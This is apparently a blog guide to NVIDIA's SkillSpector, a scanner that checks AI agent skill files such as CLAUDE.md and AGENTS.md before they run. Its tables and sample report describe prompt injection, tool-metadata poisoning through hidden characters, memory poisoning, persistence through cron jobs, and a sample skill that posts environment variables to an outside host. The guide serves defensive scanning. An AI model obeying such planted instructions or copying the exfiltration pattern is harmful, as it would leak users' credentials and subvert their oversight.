Table of Contents
AI Agent Skill Security: How to Scan CLAUDE.md, AGENTS.md, and Skill Files Before They Run
26.1% of AI agent skills contain security vulnerabilities, and 5.2% show likely malicious intent, per NVIDIA's research cited in the SkillSpector README. That is the finding to act on. A skill file is the CLAUDE.md, AGENTS.md, or SKILL.md that tools like Claude Code, Codex CLI, and Gemini CLI load automatically when they start, and roughly one in four of them carries a defect a scanner can catch before it runs. SkillSpector, NVIDIA's open-source scanner for exactly this surface, hit more than 7,000 stars (7.6k, per the repo's GitHub page) and trended #3 on GitHub's Python list this week, which tells you the gap is being taken seriously now rather than in the abstract.
This guide is for the developer or ops lead who installs third-party skill files, or who runs an agent in CI. We walk through what the threat actually is, how to scan a file in one command, how to read the score, and the one flag to set first.
What an agent skill is, and why it runs with no vetting step
An agent skill is plain instruction text plus, often, helper scripts. When Claude Code or Codex CLI opens a project, it reads the skill files in scope and folds them into the agent's context, and any scripts they reference run with your shell's privileges, per the SkillSpector README. There is no package registry, no signature check, no review queue. You clone a repo or paste a skill from a gist, the agent picks it up, and it executes with implicit OS trust the moment the session starts.
That is a different attack surface from the one we covered in TrustFall, which abused the MCP trust dialog to auto-run a server defined in .mcp.json. Same threat category, different door. TrustFall weaponized the config that loads tools. Skill files weaponize the instructions that steer the agent and the scripts they carry. If you are mapping the broader picture, our MCP stateless migration guide covers how the protocol layer underneath all of this has been shifting. The skill layer is the part with no gatekeeper at all, which is what makes the 26.1% number land.
What SkillSpector scans for
SkillSpector ships 64 vulnerability patterns across 16 categories, per the README. The full list is below. Three categories carry most of the real-world risk, so read those rows first.
| Category | Patterns | What it catches |
|---|---|---|
| Prompt injection | 5 | Instructions that override safety constraints, hidden directives in comments or invisible text, commands to exfiltrate context |
| Data exfiltration | 4 | Env-variable harvesting (API keys), file-system enumeration, transmitting context to external URLs |
| MCP tool poisoning | 4 | Hidden directives in tool metadata (HTML comments, zero-width chars, base64), homoglyph and right-to-left deception, description-vs-behavior mismatch |
| Privilege escalation | 3 | Sudo/root execution, reading SSH keys and tokens |
| Supply chain | 6 | curl | bash remote execution, obfuscated payloads, dependencies with known CVEs via a live OSV.dev lookup, typosquatting |
| Excessive agency | 4 | Unrestricted tool access, autonomous high-impact decisions with no human in the loop |
| Output handling | 3 | Model output used without sanitization across a trust boundary |
| System prompt leakage | 3 | Direct and indirect extraction of system prompts or internal rules |
| Memory poisoning | 3 | Content built to persist across sessions, context-window stuffing that displaces safety constraints |
| Tool misuse | 3 | Parameter abuse (shell=True, --force), chains that bypass per-tool checks |
| Rogue agent | 2 | Runtime self-modification, persistence via cron jobs or startup scripts |
| Trigger abuse | 3 | Triggers that shadow built-in commands, generic keyword baiting |
| Dangerous code (AST) | 8 | exec(), eval(), dynamic imports, subprocess, os.system, and chained execution |
| Taint tracking | 5 | Credential-to-network flows, file-read-to-exfiltration, external-input-to-code-execution |
| YARA signatures | 4 | Known malware, webshell, cryptominer, and exploit-tool matches |
| MCP least privilege | 4 | Capabilities used but not declared, wildcard permissions, missing permission fields |
Source: SkillSpector README.
The dangerous three are at the top for a reason. Prompt injection is the one most people picture: a line buried in a skill that tells the agent to ignore its guardrails or quietly forward your context elsewhere. Data exfiltration is where a skill harvests os.environ and posts it to an external host, which is how a credential leak becomes a credential theft. MCP tool poisoning is the subtle one. It hides directives inside tool metadata using zero-width characters or homoglyphs, so the description a human reads and the instruction the model parses are not the same string. Static patterns plus optional LLM evaluation are how SkillSpector reaches those last two, since a homoglyph attack is invisible to a quick eyeball pass.
How to run a scan
SkillSpector needs Python 3.12+, per the README. Clone it, drop into a virtualenv, and run make install.
# Install from source (requires Python 3.12+)
git clone https://github.com/NVIDIA/skillspector.git
cd skillspector
# Create and activate a virtual environment
python3 -m venv .venv && source .venv/bin/activate
# Install for production use
make install
If you would rather not put Python on the box, build the image and run it in a container. SkillSpector ships a Dockerfile based on the official python:3.12-slim-bookworm image, per the README.
# Build the container, then scan the current directory mounted at /scan
make docker-build
docker run --rm -v "$PWD:/scan" skillspector scan ./my-skill/ --no-llm
Once installed, the scan target can be a directory, a single file, a Git URL, or a zip. The same scan verb covers all four input shapes.
# Scan a local skill directory
skillspector scan ./my-skill/
# Scan a single SKILL.md (or CLAUDE.md / AGENTS.md) file
skillspector scan ./SKILL.md
# Scan a Git repository directly
skillspector scan https://github.com/user/my-skill
A scan, start to finish
Here is the shape of a real run against a skill that harvests environment variables and ships them out. The input is a directory with a SKILL.md and a helper script; the command is a single static-only scan; the output is a risk score, a severity band, and the specific findings with line numbers.
Input: ./suspicious-skill/ containing SKILL.md and scripts/sync.py.
Command:
skillspector scan ./suspicious-skill/ --no-llm
Expected output (abbreviated):
SkillSpector Security Report v2.0.0
Skill: suspicious-skill
Source: ./suspicious-skill/
Risk Assessment
Metric Value
Score 78/100
Severity HIGH
Recommendation DO NOT INSTALL
Issues (2)
HIGH: Env Variable Harvesting (E2)
Location: scripts/sync.py:23
Finding: for key, val in os.environ.items():...
Confidence: 94%
HIGH: External Transmission (E1)
Location: scripts/sync.py:45
Finding: requests.post("https://api.skill.io/env"...
Confidence: 89%
# ... (component table and full explanations omitted)
The output above mirrors the example in the SkillSpector README. Two HIGH findings, one harvesting os.environ and one posting it to an external host, stack into a 78/100 HIGH score with a flat "DO NOT INSTALL" recommendation. That is the pattern the scanner is built to surface: not one smoking gun, but a chain.
Reading the results
The headline is a single number from 0 to 100, and each finding adds to it by severity, per the README: a CRITICAL issue is +50, a HIGH is +25, a MEDIUM is +10, a LOW is +5, and anything in an executable script gets a 1.3x multiplier on top. The total maps to four bands with a plain-language recommendation.
| Score | Severity | Recommendation |
|---|---|---|
| 0-20 | LOW | SAFE |
| 21-50 | MEDIUM | CAUTION |
| 51-80 | HIGH | DO NOT INSTALL |
| 81-100 | CRITICAL | DO NOT INSTALL |
Source: SkillSpector README.
The bands are deliberately blunt. Anything above 50 is a "do not install," full stop, and the scoring math means a single CRITICAL finding alone (50, before the executable multiplier) drops you into that zone. Treat MEDIUM as "read every finding by hand before you trust it," not as a passing grade.
For automation, the format that matters is SARIF. SkillSpector emits Terminal, JSON, Markdown, and SARIF, per the README, and SARIF is the one CI systems and IDEs speak. Write it to a file and a GitHub code-scanning workflow can ingest it like any other static-analysis result.
# Emit SARIF for CI / GitHub code scanning
skillspector scan ./my-skill/ --no-llm --format sarif --output report.sarif
That turns "is this skill safe" from a one-off question into a gate that runs on every change.
SkillSpector vs GitHub Copilot's validation: what each covers
A reasonable question: doesn't GitHub already do this? On June 9, 2026, GitHub made security validation for third-party coding agents generally available, extending to agents like Claude and OpenAI Codex the checks already running for Copilot's own cloud agent, per the GitHub changelog. When one of those agents opens a pull request, GitHub runs three checks on the code it wrote: CodeQL analysis, a dependency screen against the GitHub Advisory Database, and secret scanning. If it finds something, the agent tries to fix it before finalizing the PR.
That is real coverage, and it is the wrong layer for this problem. Copilot's validation looks at the code the agent generates. SkillSpector looks at the instruction files that configure the agent in the first place. A poisoned CLAUDE.md never shows up as a vulnerability in a generated diff, because the malicious part is the steering text, not the output. It can sit in your repo, shape every agent run, and pass CodeQL clean because there is no vulnerable code for CodeQL to find.
| Layer | GitHub Copilot validation | SkillSpector |
|---|---|---|
| Agent-generated code in a PR | Covered (CodeQL, Advisory DB, secret scan) | Not the target |
Skill / instruction files (CLAUDE.md, AGENTS.md, SKILL.md) | Not scanned | Covered (64 patterns) |
| MCP tool metadata poisoning | Not scanned | Covered |
| A subtle prompt injection that passes static checks | Gap | Reduced by LLM stage, not eliminated |
Sources: GitHub changelog and SkillSpector README.
Neither fully closes the hardest case. A prompt injection written in clean prose with no executable tell can slip past static patterns, and SkillSpector's optional LLM evaluation reduces that risk without erasing it. The honest framing is layered defense: Copilot guards the output, SkillSpector guards the input, and a careful human still reads anything that scores MEDIUM or above.
The verdict: run it, and set one flag first
If your team installs third-party skill files, pulls agent configs from public repos, or runs any agent in CI, run SkillSpector. The decision is not close. There is no other open-source scanner aimed squarely at the skill-file surface, the install is a clone and a make install, and the 26.1% base rate, per the README, means a scan pays for itself the first time it flags a real one. The cost of skipping it is a poisoned instruction file steering an agent that already runs with your privileges.
Set --no-llm first. The static-only path needs no API key, runs fast enough to drop into a pre-commit hook or a CI job, and catches the executable and supply-chain patterns that do the most damage, per the README. Add the LLM stage later for the subtle prompt-injection and tool-poisoning cases once the fast gate is in place. The order matters: a fast static gate you actually run beats a thorough scan you skip because it is slow.
For a CI scan pipeline, the container path is the clean way to ship it. Build the image once, run it against every skill file on push, and emit SARIF into your code-scanning workflow with no Python on the runner at all. A managed VPS such as Cloudways gives you a persistent box to host that container and your scan pipeline without standing up infrastructure by hand. Point it at your repos, gate on a HIGH score, and the question "is this skill safe to install" stops being something you answer by reading and starts being something your pipeline answers for you.